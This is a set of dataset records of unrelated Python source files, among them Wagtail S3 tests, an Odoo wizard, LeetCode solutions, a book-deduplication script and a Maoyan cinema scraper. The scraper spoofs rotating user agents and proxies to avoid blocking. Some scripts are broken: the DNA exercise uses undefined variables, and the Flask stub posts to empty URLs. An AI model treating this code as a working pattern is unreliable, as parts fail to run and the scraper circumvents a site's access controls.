reference VCF file `testData.vcf` (not provided)\nin the execution directory.\n\nJudiciary Pag\nJanuary 2016\n\"\"\"\n\n# Useful stuff to come...\nfrom __future__ import print_function\n\nimport os.path\nimport sys\n\nimport SimpleVcfParser\nimport VariantStore\n\n# The filename of the test data...\nFILE_NAME = 'testData.vcf'\n\n# File must exist...\nif not os.path.isfile(FILE_NAME):\n print(\"Couldn't find test file (%s).\"\n \" Please put it in the execution directory.\" % FILE_NAME)\n sys.exit(1)\n\n# Create a variant store object (to accumulate file records)\n# and a VCF file parser to parse the example file...\nvariant_store = VariantStore.VariantStore()\nvcf_parser = SimpleVcfParser.SimpleVcfParser(FILE_NAME)\n\n# Iterate through the file\n# adding the extracted records to the variant store...\nfor vcf_record in vcf_parser:\n variant_store.add(vcf_record)\n\n# Done.\n\n# Get the collected data...\nsummary = variant_store.get_summary()\ngene_summary = variant_store.get_gene_summary()\n\n# ...and summarise...\nprint('Summary:')\nprint(' %s' % str(summary))\nprint('Gene Summary (%d):' % len(gene_summary))\nfor gene in sorted(gene_summary):\n print(' %s %s' % (gene, gene_summary[gene]))\n\n#variant_store.dump()\n","sub_path":"DeveloperTask.py","file_name":"DeveloperTask.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"330549242","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models, SUPERUSER_ID, _\nfrom odoo.exceptions import UserError\nimport datetime\n\n\nclass WizardSetupConsignment(models.TransientModel):\n _name = 'wizard.setup.consignment'\n\n def setup(self):\n consignment_location = self.setup_stock_location()\n\n return True\n\n @api.model\n def setup_stock_location(self):\n consignment_locations = \\\n self.env['stock.location'].search(\n [('consignment', '=', True),('usage', '=', 'internal')])\n if consignment_locations:\n return consignment_locations[0]\n vals = {\n 'name': _('Consignment warehouse'),\n 'consignment': True\n }\n consignment_location = self.env['stock.location'].create(vals)\n return 
consignment_location\n\n","sub_path":"ERP_IN/addons/btek_sale/wizard/models/wizard_setup_consignment.py","file_name":"wizard_setup_consignment.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"571044189","text":"class Solution(object):\n def addDigits(self, num):\n \"\"\"\n :type num: int\n :rtype: int\n \"\"\"\n if len(str(num)) == 1:\n return num\n\n num = str(num)\n result = 0\n\n while len(num) > 1:\n for i in reversed(range(len(num))):\n result += int(num[i])\n num = str(result)\n result = 0\n\n return int(num)\n\n def addDigits_02(self, num):\n \"\"\"\n :type num: int\n :rtype: int\n \"\"\"\n if num == 0:\n return 0\n else:\n return (num - 1) % 9 + 1\n","sub_path":"LPractice/258. Add Digits.py","file_name":"258. Add Digits.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"388838682","text":"from urllib.parse import urlparse\n\nfrom django.conf import settings\nfrom django.test import TestCase\nfrom django.test.client import Client\nfrom django.urls import reverse\n\nfrom wagtail.core.models import Collection\n\nimport boto3\nfrom moto import mock_s3\n\nfrom wagtail_storages.factories import CollectionViewRestrictionFactory, DocumentFactory\n\n\n@mock_s3\nclass AmazonS3DocumentTests(TestCase):\n def check_s3_url(self, url):\n return 's3.amazonaws.com' in url\n\n def check_url_signed(self, url):\n parsed_url = urlparse(url)\n # Make sure query parameters match signed URL's parameters\n return all(query_arg in parsed_url.query for query_arg in {\n 'AWSAccessKeyId',\n 'Signature',\n 'Expires',\n })\n\n def check_document_is_public(self, document):\n all_users = 'http://acs.amazonaws.com/groups/global/AllUsers'\n # Loop over all the grants.\n for grant in document.file.file.obj.Acl().grants:\n # Find the all users grantee.\n if 'URI' not in grant['Grantee']:\n continue\n if grant['Grantee']['URI'] == all_users:\n if grant['Permission'] == 'READ':\n return True\n return False\n\n def setUp(self):\n # Create S3 bucket\n bucket_name = settings.AWS_STORAGE_BUCKET_NAME\n conn = boto3.resource('s3', region_name='eu-west-1')\n conn.create_bucket(Bucket=bucket_name)\n\n self.client = Client()\n self.root_collection = Collection.get_first_root_node()\n self.private_collection = self.root_collection.add_child(\n name='Restricted collection',\n )\n self.private_collection_restriction = CollectionViewRestrictionFactory(collection=self.private_collection) # noqa\n self.view_restriction_session_key = self.private_collection_restriction.passed_view_restrictions_session_key # noqa\n\n def test_create_public_document(self):\n # Create document.\n document = DocumentFactory()\n\n # Check the document is on amazon's servers.\n self.assertTrue(self.check_s3_url(document.file.url))\n\n # Load the document\n url = reverse(\n 'wagtaildocs_serve',\n args=(document.id, document.filename),\n )\n response = self.client.get(url)\n\n # Test wagtail redirects to S3.\n self.assertEquals(response.status_code, 302)\n self.assertTrue(response.url)\n # Check object is public\n self.assertTrue(self.check_document_is_public(document))\n\n def test_create_private_document(self):\n # Create document.\n document = DocumentFactory()\n # Add the document to the private collection.\n document.collection = self.private_collection\n document.save()\n\n # Check the document is on amazon's servers.\n 
self.assertTrue(self.check_s3_url(document.file.url))\n\n # Authorise the session.\n s = self.client.session\n s.update({\n self.view_restriction_session_key: [self.private_collection_restriction.id], # noqa\n })\n s.save()\n\n # Load the document\n url = reverse(\n 'wagtaildocs_serve',\n args=(document.id, document.filename),\n )\n response = self.client.get(url)\n\n # Test wagtail redirects to S3.\n self.assertEquals(response.status_code, 302)\n self.assertTrue(response.url)\n # Check object is not public\n self.assertFalse(self.check_document_is_public(document))\n","sub_path":"wagtail_storages/tests/test_protected_documents.py","file_name":"test_protected_documents.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"327243112","text":"# -*- coding:utf-8 -*-\n# __author__ = \"shitou6\"\nimport json\nimport logging\nimport random\nimport traceback\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nlogger=logging.getLogger(__name__) # 设置日志名称\nlogger.setLevel(logging.INFO) #设置日志打印等级\nhandler=logging.FileHandler(\"log.txt\") # 创建日志文件\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')# 设置日志的打印格式\nhandler.setFormatter(formatter) #\nlogger.addHandler(handler)\n\ndef find_all_movies():\n movies_date = {}\n vip_days = []\n url = 'https://maoyan.com/cinema/12916?poi=4267320'\n USER_AGENTS = [\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)\",\n \"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)\",\n \"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0\",\n \"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5\"\n ]\n headers = {'User-Agent': random.choice(USER_AGENTS)}\n with open('ip.json', 'r') as file:\n data = json.load(file)\n try:\n r = requests.get(url=url, headers=headers, proxies=random.choice(data))\n r.raise_for_status()\n soup = BeautifulSoup(r.text, 'lxml')\n\n movies_id_list = soup.find('div', class_=\"movie-list\").find_all(\"div\", class_=\"movie\")\n\n movies = soup.find_all('div', class_='show-list')\n for each in movies: # 遍历每个电影\n dates = each.find('div', class_=\"show-date\").find_all('span', class_=\"date-item\")\n movie_name = (each.find('h3', class_=\"movie-name\").get_text())\n movies_date.setdefault(movie_name, {})\n\n movie_info = {\n \"info\": str(each.find(\"div\", class_=\"movie-desc\").text).replace(\"\\n\", \" \"),\n \"movie_id\": movies_id_list[movies.index(each)][\"data-movieid\"]\n }\n movies_date[movie_name]['movie_info'] = movie_info\n plist = list(each.find_all('div', class_='plist-container'))\n movies_date[movie_name].setdefault(\"movies_day\", [])\n for each_p in plist: # 遍历每一天\n try:\n movies_day = (\"{}日\".format(dates[plist.index(each_p)].get_text()))\n temp_dict = {movies_day: []}\n dangqi = each_p.find('tbody').find_all('tr')\n for each_tr in dangqi: # 遍历每一天的每一个档期\n things = 
each_tr.find_all('td')\n begin_time = things[0].find('span', class_='begin-time').get_text()\n end_time = str(things[0].find('span', class_='end-time').get_text()).replace(\"散场\", \"\")\n banben = things[1].get_text()\n ting = things[2].get_text().split('-')[0]\n print_str = (\n \"开场:{},结束:{},类型:{},大厅:{}\".format(begin_time, end_time, banben, ting).replace(\"\\n\", \"\"))\n # print(print_str)\n temp_dict[movies_day].append(print_str)\n if begin_time == \"18:00\":\n vip_days.append(\"{} | {} | {}\".format(movie_name, movies_day, print_str))\n movies_date[movie_name][\"movies_day\"].append(temp_dict)\n except:\n logger.error(traceback.format_exc())\n pass\n\n movies_date.setdefault('vip', vip_days)\n except:\n logger.error(traceback.format_exc())\n file = open('error.html', 'w', encoding='utf8')\n file.write(r.text)\n return movies_date\n\ndef pretty_dict(my_dict): # 美观打印\n # 利用json的打印 友好打印字典等结构。备用\n print(json.dumps(my_dict, ensure_ascii=False, indent=1))\n\ndef get_all_movie_names():\n data = find_all_movies()\n message = \"全部电影:\\n=======================\\n\"\n for key in data.keys():\n message += key\n message += '\\n'\n return message\n\n\n\ndef func(ddd):\n data = ddd\n func_meun = \"\"\"\n 1.查看当前所有电影\n 2.搜索电影档期\n 3.搜索会员档期\n \"\"\"\n print(func_meun)\n while 1:\n num = int(input(\"请输入数字:\"))\n if num == 1:\n for key in data.keys():\n print(key)\n if num == 2:\n movies_name = input(\"请输入电影名称\")\n for key in data.keys():\n if movies_name in key or movies_name == key:\n dd = data[key]\n pretty_dict(dd)\n if num == 3:\n pretty_dict(data['vip'])\n\n flag = input(\"是否继续:是(Y/y)\")\n if flag == 'y' or flag == 'Y':\n pass\n else:\n break\n pass\n\ndef find_movie(movie_name):\n data = find_all_movies()\n for key in data.keys():\n if movie_name in key or movie_name == key:\n dd = data[key]['movies_day']\n return dd\n return None\n\ndef find_vip_movie():\n data = find_all_movies()\n now_data = data['vip']\n\n def return_item(ss):\n return int(ss.split('|')[1].split(' ')[2].split('月')[1][:-1])\n\n now_data.sort(key=return_item)\n return now_data\n\ndef write_json():\n data = find_all_movies()\n file = open(\"data.json\", \"w\", encoding='utf8')\n json.dump(data, file, ensure_ascii=False)\n\ndef get_movies_info(word):\n data = find_all_movies()\n if data:\n for keys in data.keys():\n if word in keys:\n return get_movies_info_by_id(data[keys]['movie_info']['movie_id'])\n else:\n return None\n\n\n\ndef get_movies_info_by_id(movid_id): # 爬取电影的简介,评论等。\n url = 'https://maoyan.com/films/' + movid_id\n USER_AGENTS = [\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)\",\n \"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)\",\n \"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0\",\n \"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5\"\n ]\n headers = {'User-Agent': random.choice(USER_AGENTS)}\n with open('ip.json', 'r') as file:\n data = json.load(file)\n try:\n r 
= requests.get(url=url, headers=headers, proxies=random.choice(data))\n r.raise_for_status()\n soup = BeautifulSoup(r.text, 'lxml')\n movie_info1 = soup.find(\"div\", class_=\"movie-brief-container\")\n name = movie_info1.find('h3', class_=\"name\").get_text()\n other = movie_info1.find('ul').text.replace('\\n', \" \")\n jianjie = soup.find('div', class_=\"mod-content\").text\n comments_list = []\n comments = soup.find_all('li', class_=\"comment-container\")\n for each in comments:\n comments_list.append(each.find('div', class_=\"comment-content\").get_text())\n info = {\"name\": name,\n \"other\": other,\n \"jianjie\": jianjie,\n \"comments\": comments_list}\n return info\n except:\n logger.error(traceback.format_exc())\n return None\n\n\nif __name__ == '__main__':\n # pretty_dict(find_vip_movie())\n\n # write_json()\n # print(get_movies_info(\"调音\"))\n\n a = find_all_movies()\n print(a)\n","sub_path":"xinfulanhai.py","file_name":"xinfulanhai.py","file_ext":"py","file_size_in_byte":8454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"476538025","text":"# -*- coding: utf-8 -*-\n#importar libreria para Jaro\nimport jellyfish\nimport time\nimport sys\n\n#definir variables\nanio = 2016\n\nstart_time = time.time()\nlistaLibros = [] \nlistaLibrosDedup = []\nv_producion1 = v_persona_id1 = v_produccion2 = v_persona_id2 = v_anio1 = v_anio2 = 0\nv_titulo1 = v_titulo2 = v_isbn1 = v_isbn2 = v_isbn1_fuzzy = v_isbn2_fuzzy = v_titulo1_fuzzy = v_titulo2_fuzzy = v_editorial1 = v_editorial2 = v_idioma_id1 = v_idioma_id2 = \"\"\nv_factor_jaro = 0\nv_factor_jaro_minimo = 0.88\nv_se_inserto = 0 \n\npath_carpeta_archivos = \"/home/mpierri/deduplicar_libros\"\npath_lote_completo = path_carpeta_archivos + \"/listado_libros_completo_\" + str(anio) + \".txt\"\npath_deduplicar = path_carpeta_archivos + \"/listado_libros_deduplicar_\" + str(anio) + \".txt\"\npath_archivo_salida = path_carpeta_archivos + \"/listado_libros_fuzzy_\" + str(anio) + \".txt\"\n\n#path_carpeta_archivos = \"C:\\pdi-ce-5.3.0.0-213\\libros_anios_eva_20170625\"\n#path_lote_completo = path_carpeta_archivos + \"\\listado_libros_completo_\" + str(anio) + \".txt\"\n#path_deduplicar = path_carpeta_archivos + \"\\listado_libros_deduplicar_\" + str(anio) + \".txt\"\n#path_archivo_salida = path_carpeta_archivos + \"\\listado_libros_fuzzy_\" + str(anio) + \".txt\"\n\n#se abre el archivo de capitulos de libro para lectura\nf = open(path_lote_completo,\"r\", encoding=\"latin-1\") #abre el archivo con el lote completo de libros\nf2 = open(path_deduplicar,\"r\", encoding=\"latin-1\") #abre el archivo con el lote a buscar duplicados\nfd = open(path_archivo_salida,\"w\")\n\n#se leen las lineas del archivo y se ponene en una lista\nfor line in f:\n listaLibros.append(line)\nf.close()\n#cargo en una lista el listado de libros a deduplicar\nfor line in f2:\n listaLibrosDedup.append(line)\nf2.close()\n\n#itero sobre la coleccion de libros para ir tomando de a 1 y comparando con el resto\n#salvo el mismo libro\n\n#iteracion principal\nfor x in range(len(listaLibrosDedup)): \n #lee los datos del articulo a buscar duplicado\n v_produccion1, v_persona_id1, v_titulo1,v_titulo1_fuzzy, v_isbn1, v_isbn1_fuzzy, v_idioma_id1, v_editorial1, v_anio1 = listaLibrosDedup[x].split(\"|\")\n v_se_inserto = 0 #inicializo la marca \n v_factor_jaro_titulo = 0 #se inicializa para cada libro a deduplicar\n \n for y in range(len(listaLibros)):\n #lee los datos del articulo a comparar\n v_produccion2, v_persona_id2, v_titulo2, 
v_titulo2_fuzzy, v_isbn2, v_isbn2_fuzzy, v_idioma_id2, v_editorial2, v_anio2 = listaLibros[y].split(\"|\")\n \n #se fija que no se compare el mismo produccion_id \n if(v_produccion1 != v_produccion2):\n #calculo el fuzzy de Jaro con los titulos de los libros\n v_factor_jaro = round(jellyfish.jaro_distance(v_titulo1_fuzzy, v_titulo2_fuzzy),2)\n \n # Verifico si el isbn2_fuzzy viene vacio y le pongo un cero para que en la comparacion siguiente\n # no lo considere igual a otro isbn si exise\n if(v_isbn2_fuzzy.strip() == ''):\n v_isbn2_fuzzy = '0'\n \n # si el factor jaro es mayor o igual al minimo seteado o los ISBN son iguales \n # o si los ISBN son iguales y no son cero\n # tenemos un duplicado y se se agrega en el archivo de salida\n if(v_factor_jaro >= v_factor_jaro_minimo):\n #inserto en el archivo de destino el duplicado\n fd.write(str(anio) + '|' + v_produccion1 + '|' + v_persona_id1 + '|' + v_titulo1 + '|' + v_titulo1_fuzzy + '|' + v_isbn1 + '|' + v_isbn1_fuzzy + '|' + v_idioma_id1 + '|' + v_editorial1 +'|' + str(v_factor_jaro) + '|' + v_produccion2 + '|' + v_persona_id2.replace('\\n', '') + '|' + v_titulo2 + '|' + v_titulo2_fuzzy + '|' + v_isbn2 + '|' + v_isbn2_fuzzy + '|' + v_idioma_id2 + '|' + v_editorial2 + '\\n')\n #se usa para control mas adelante\n v_se_inserto = 1 \n \n else:\n if((v_factor_jaro >= 0.80 and v_factor_jaro < v_factor_jaro_minimo) and (v_isbn1_fuzzy == v_isbn2_fuzzy and int(v_isbn2_fuzzy) != 0)):\n #inserto en el archivo de destino el duplicado\n fd.write(str(anio) + '|' + v_produccion1 + '|' + v_persona_id1 + '|' + v_titulo1 + '|' + v_titulo1_fuzzy + '|' + v_isbn1 + '|' + v_isbn1_fuzzy + '|' + v_idioma_id1 + '|' + v_editorial1 +'|' + str(v_factor_jaro) + '|' + v_produccion2 + '|' + v_persona_id2.replace('\\n', '') + '|' + v_titulo2 + '|' + v_titulo2_fuzzy + '|' + v_isbn2 + '|' + v_isbn2_fuzzy + '|' + v_idioma_id2 + '|' + v_editorial2 + '\\n')\n #se usa para control mas adelante\n v_se_inserto = 1 \n #se verifica si el jaro esta entre 0.80 y 0.87 y que uno o los dos ISBN esten vacios\n #verifico si los isbn estan cargados\n if((v_factor_jaro >= 0.80 and v_factor_jaro < v_factor_jaro_minimo) and (v_isbn1.strip() == '' or v_isbn2.strip() == '')) :\n #inserto en el archivo de destino para revision manual\n fd.write(str(anio) + '|' + v_produccion1 + '|' + v_persona_id1 + '|' + v_titulo1 + '|' + v_titulo1_fuzzy + '|' + v_isbn1 + '|' + v_isbn1_fuzzy + '|' + v_idioma_id1 + '|' + v_editorial1 +'|' + str(v_factor_jaro) + '|' + v_produccion2 + '|' + v_persona_id2.replace('\\n', '') + '|' + v_titulo2 + '|' + v_titulo2_fuzzy + '|' + v_isbn2 + '|' + v_isbn2_fuzzy + '|' + v_idioma_id2 + '|' + v_editorial2 + '\\n')\n #se usa para control mas adelante\n v_se_inserto = 1\n \n #FIN 2do for\n #el libro comparado no tiene duplicado\n if(v_se_inserto == 0):\n #inserto en el archivo de destino\n fd.write(str(anio) + '|' + v_produccion1 + '|' + v_persona_id1 + '|' + v_titulo1 + '|' + v_titulo1_fuzzy + '|' + v_isbn1 + '|' + v_isbn1_fuzzy + '|' + v_idioma_id1 + '|' + v_editorial1 + '|' + '0.00' + '|' + '|' + '|' + '|' + '|' + '|'+ '|'+ '|'+ '|') \n \n if x != len(listaLibrosDedup)-1:\n fd.write('\\n') \n#cierra el archivo destino \nfd.close()\n\nprint(\"--- %s SEGUNDOS ---\" % (time.time() - start_time))\nsys.exit(0)\n","sub_path":"deduplicar_libros/deduplicar_libros.py","file_name":"deduplicar_libros.py","file_ext":"py","file_size_in_byte":6188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"419975044","text":"import tensorflow as 
tf\nfrom other.nn_func import leaky_relu\nimport tensorflow.contrib.layers as ly\n\n# Created in nn_func.py, instead of importing from here.\n# WEIGHT_INITIALIZER = tf.truncated_normal_initializer(stddev=0.01)\n\n# Optimizer hyper parameters for discriminator\nOPTIMIZER_DIS_HP = {'learning_rate': 0.0001,\n 'optimizer': tf.train.AdamOptimizer,\n 'lambda': 10, # coefficient when compute gradient penalty, only for Dis optmzr\n 'clip': 0.01\n }\n\nOPTIMIZER_GEN_HP = {'learning_rate': 0.0001,\n 'optimizer': tf.train.AdamOptimizer,\n }\n\n# Generator hyper parameters\nGENERATOR_HP = {'z_dim': 128,\n 'gf_dim': 64,\n # 'emb_reduced_dim': 256,\n # 'kernel_size': 3,\n # 'stride': 2,\n 'act_fn': tf.nn.relu,\n 'norm_fn': ly.batch_norm,\n # 'normalizer_fn': None,\n # 'weights_initializer': tf.truncated_normal_initializer(stddev=0.01)\n }\n\n# Discriminator hyper parameters\nDISCRIMINATOR_HP = {'df_dim': 64,\n 'emb_reduced_dim': 8 * 64,\n # 'kernel_size': 3,\n # 'stride': 2,\n 'act_fn': leaky_relu,\n 'norm_fn': None,\n # 'weights_initializer': tf.truncated_normal_initializer(stddev=0.01),\n }\n","sub_path":"model_911/hyperparameter.py","file_name":"hyperparameter.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"41321997","text":"import json\nfrom flask import Flask, request\n# from tweet_listener import get_tweets\n# from sentiment_analyzer import get_tweet_sentiments\n\napp = Flask(__name__)\napp.config.update(\n DEBUG=True,\n SECRET_KEY='EVERTWEET'\n)\n\n@app.route('/getTwitterData/', methods=['GET', 'POST'])\ndef getTwitterData(username):\n\ttweets = request.post('', json=username)\n\treturn json.dumps(tweets)\n\n@app.route('/getSentimentList/', methods=['GET', 'POST'])\ndef get_sentiment_list(username):\n # tweets = get_tweets(username)\n tweets = request.post('', json=username)\n sentiments = request.post('', json=json.loads(tweets))\n return json.dumps(sentiments)\n\nif __name__ == '__main__':\n app.run(port=8080, host='0.0.0.0')\n","sub_path":"example/EverTweet-Lambda/backend/orchestrator/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"338491754","text":"#Assignment 8\n#Coded by Daniel Sim - 2011/08/06\n\n#This program reads in text from the keyboard until an exclamation mark is found.\n#It then counts the instances of each letter, and the total of other characters.\n#Finally, it figures out which letter(s) were found the most and least often.\n\nimport re;\n\ndef main():\n\n nonlettercheck = \"[^A-Z]\";\n\n inputlist = [];\n letterlist = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"M\",\"N\",\"O\",\\\n \"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"Z\"];\n lettercount = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0];\n othercount = 0;\n letter = \"\";\n greatestnum = 0;\n leastnum = 1;\n mostletter = [];\n leastletter = [];\n msg = input(\"Enter a string here (will stop reading at \\\"!\\\"): \");\n for letter in msg:\n if letter != \"!\" and len(letter) != 1:\n print(\"Invalid input! 
Must be a single character!\");\n elif letter == \"!\":\n break;\n else:\n inputlist.append(letter.upper());\n leastnum += 1;\n letter = \"\";\n for character in range(len(inputlist)):\n if not re.search(nonlettercheck, inputlist[character].upper()):\n lettercount[letterlist.index(inputlist[character])] += 1;\n else:\n othercount += 1;\n for num in range(len(lettercount)):\n if lettercount[num] > 0:\n print(\"Number of\", letterlist[num] + \"'s:\", lettercount[num]);\n print(\"Number of other characters:\", othercount);\n\n for num in range(len(lettercount)):\n if lettercount[num] > greatestnum:\n mostletter = [];\n mostletter.append(letterlist[num]);\n greatestnum = lettercount[num];\n elif lettercount[num] == greatestnum:\n mostletter.append(letterlist[num]);\n print(\"Letter(s) that was/were found the most:\", mostletter);\n \n for num in range(len(lettercount)):\n if lettercount[num] < leastnum and lettercount[num] != 0:\n leastletter = [];\n leastletter.append(letterlist[num]);\n leastnum = lettercount[num];\n elif lettercount[num] == leastnum:\n leastletter.append(letterlist[num]);\n print(\"Letter(s) that was/were found the least, but at least once:\", \\\n leastletter);\n\nif __name__ == \"__main__\":\n main();\n\n","sub_path":"schoolwork/NYU_IntroToCP_Summer2011/Sim_Daniel_assign8b.py","file_name":"Sim_Daniel_assign8b.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"484538762","text":"\"\"\"\nGiven a non-empty binary search tree and a target value, find the value in the BST that is closest to the target.\n\nNote:\n\nGiven target value is a floating point.\nYou are guaranteed to have only one unique value in the BST that is closest to the target.\nExample:\n\nInput: root = [4,2,5,1,3], target = 3.714286\n\n 4\n / \\\n 2 5\n / \\\n1 3\n\nOutput: 4\n\"\"\"\n\n#TC O(H)\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def closestValue(self, root, target):\n closest = root.val\n while root:\n closest = min(root.val, closest, key = lambda elem: abs(target - elem))\n root = root.left if target < root.val else root.right\n return closest\n","sub_path":"270_closest_bin_Search.py","file_name":"270_closest_bin_Search.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"264445070","text":"# Write a Python program that finds out who ate the ice cream. Your country will be grateful!\r\n\r\n# Hint: There are Python functions that help you find a string within a string.\r\n\r\nimport json\r\n\r\n# 1. Dictionary of DNA traits\r\nhair = {\r\n \"black\": \"CCAGCAATCGC\",\r\n \"brown\": \"GCCAGTGCCG\",\r\n \"blonde\": \"TTAGCTATCGC\"\r\n }\r\n\r\nface = {\r\n \"square\": \"GCCACGG\",\r\n \"round\": \"ACCACAA\",\r\n \"oval\": \"AGGCCTCA\"\r\n }\r\n\r\neyes = {\r\n \"blue\": \"TTGTGGTGGC\",\r\n \"green\": \"GGGAGGTGGC\",\r\n \"brown\": \"AAGTAGTGAC\"\r\n }\r\n\r\ngender = {\r\n \"female\": \"TGAAGGACCTTC\",\r\n \"male\": \"TGCAGGAACTTC\"\r\n }\r\n\r\nrace = {\r\n \"white\": \"AAAACCTCA\",\r\n \"black\": \"CGACTACAG\",\r\n \"asian\": \"CGCGGGCCG\"\r\n }\r\n\r\n# 2. 
Dictionary of suspects with a list of their traits taken from the dictionary\r\n\r\nsuspects = {\r\n \"Eva\": [\"female\", \"white\", \"blonde\", \"blue\", \"oval\"],\r\n \"Larisa\": [\"female\", \"white\", \"brown\", \"brown\", \"oval\"],\r\n \"Matej\": [\"male\", \"white\", \"black\", \"blue\", \"oval\"],\r\n \"Miha\": [\"male\", \"white\", \"brown\", \"green\", \"square\"]\r\n }\r\n\r\n\r\n# 3. We have all dictionaries and our suspects. Next, import the suspect's DNA:\r\n\r\nwith open(\"dna.txt\", \"r\") as suspect_file:\r\n dna = suspect_file.read()\r\n\r\n# And make the suspect blank value:\r\n\r\nperson = []\r\n\r\n# 5. now we have to make a program that looks for traits in the suspect's DNA\r\n\r\nfor i in gender:\r\n if gender[i] in dna:\r\n print(i)\r\n person.append(i)\r\n\r\nfor i in race:\r\n if race[i] in dna:\r\n print(i)\r\n person.append(i)\r\n\r\nfor i in hair:\r\n if hair[i] in dna:\r\n print(i)\r\n person.append(i)\r\n\r\nfor i in eyes:\r\n if eyes[i] in dna:\r\n print(i)\r\n person.append(i)\r\n\r\nfor i in face:\r\n if face[i] in dna:\r\n print(i)\r\n person.append(i)\r\n\r\n# 6. This will give us the suspect's description. Now to compare who matches:\r\n\r\nfor p in people:\r\n if suspects[s] == person:\r\n print(\"The person we're looking for is {0}\".format(s.upper()))\r\n break\r\n","sub_path":"hw_11.4_1.py","file_name":"hw_11.4_1.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"367887213","text":"from snake.scale import FileType, scale\n\n\nNAME = \"pefile\"\nVERSION = \"1.0\"\n\nAUTHOR = \"Matt Watkins\"\nAUTHOR_EMAIL = \"matthew.watkins@countercept.com\"\n\nDESCRIPTION = \"a module to perform pe analysis on PE files\"\n\nLICENSE = \"https://github.com/countercept/snake-scales/blob/master/LICENSE\"\n\nURL = \"https://github.com/countercept/snake-scales\"\n\n\n__scale__ = scale(\n name=NAME,\n description=DESCRIPTION,\n version=VERSION,\n author=AUTHOR,\n supports=[\n FileType.FILE\n ],\n)\n","sub_path":"pefile/pefile/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"156983025","text":"import numpy as np\n\n\ndef explore(C, alpha, R):\n n = np.shape(C)[0]\n\n # Compute scores\n S = C / np.sqrt(alpha)\n\n # Compute cosines\n C2 = C * C\n sumObs = np.sum(C2, axis=1)\n q = np.transpose(np.transpose(C2) / sumObs)\n\n # Compute contributions\n beta = C2 / (alpha * n)\n\n # Compute commonalities\n R2 = R * R\n common = np.cumsum(R2, axis=1)\n return S, q, beta, common\n","sub_path":"adaLabs/EFA/efa/EFA.py","file_name":"EFA.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} 